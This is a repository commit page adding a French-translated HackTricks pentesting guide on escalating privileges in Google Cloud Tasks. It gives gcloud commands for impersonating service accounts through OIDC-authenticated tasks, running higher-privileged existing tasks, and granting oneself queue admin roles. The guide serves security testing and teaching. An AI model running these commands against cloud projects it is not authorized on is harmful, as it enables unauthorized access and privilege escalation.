gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-02-04 11:07:37 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/gcp-security/gcp-privilege-escalation/

Browse Source
This commit is contained in:
Translator
2025-08-18 14:28:34 +00:00
parent 41f42173b5
commit 55a51c0f7b
2 changed files with 46 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
src/SUMMARY.md
View File

@@ -107,6 +107,7 @@
- [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md)
- [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md)
- [GCP - Cloud Scheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md)
- [GCP - Cloud Tasks Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md)
- [GCP - Compute Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md)
- [GCP - Add Custom SSH Metadata](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md)
- [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md)

45
src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md Normal file
View File

@@ -0,0 +1,45 @@
# GCP - Cloud Tasks Privesc
{{#include ../../../banners/hacktricks-training.md}}
## Cloud Tasks
### `cloudtasks.tasks.create`, `iam.serviceAccounts.actAs`
Un attaquant disposant de ces autorisations peut **imiter d'autres comptes de service** en créant des tâches qui s'exécutent avec l'identité du compte de service spécifié. Cela permet d'envoyer des **requêtes HTTP authentifiées aux services Cloud Run ou Cloud Functions protégés par IAM**.
```bash
gcloud tasks create-http-task \
task-$(date '+%Y%m%d%H%M%S') \
--location us-central1 \
--queue <queue_name> \
--url 'https://<service_name>.us-central1.run.app' \
--method POST \
--header 'X-Hello: world' \
--body-content '{"hello":"world"}' \
--oidc-service-account-email <account>@<project_id>.iam.gserviceaccount.com
```
### `cloudtasks.tasks.run`, `cloudtasks.tasks.list`
Un attaquant disposant de ces autorisations peut **exécuter des tâches planifiées existantes** sans avoir les autorisations sur le compte de service associé à la tâche. Cela permet d'exécuter des tâches qui ont été précédemment créées avec des comptes de service à privilèges plus élevés.
```bash
gcloud tasks run projects/<project_id>/locations/us-central1/queues/<queue_name>/tasks/<task_id>
```
Le principal exécutant cette commande **n'a pas besoin de la permission `iam.serviceAccounts.actAs`** sur le compte de service de la tâche. Cependant, cela ne permet que d'exécuter des tâches existantes - cela ne donne pas la possibilité de créer ou de modifier des tâches.
### `cloudtasks.queues.setIamPolicy`
Un attaquant avec cette permission peut **s'accorder ou accorder à d'autres principaux des rôles Cloud Tasks** sur des files d'attente spécifiques, ce qui peut potentiellement conduire à `roles/cloudtasks.admin` qui inclut la capacité de créer et d'exécuter des tâches.
```bash
gcloud tasks queues add-iam-policy-binding \
<queue_name> \
--location us-central1 \
--member serviceAccount:<account>@<project_id>.iam.gserviceaccount.com \
--role roles/cloudtasks.admin
```
Cela permet à l'attaquant d'accorder des autorisations d'administrateur Cloud Tasks complètes sur la file d'attente à tout compte de service qu'il contrôle.
## Références
- [Google Cloud Tasks Documentation](https://cloud.google.com/tasks/docs)
{{#include ../../../banners/hacktricks-training.md}}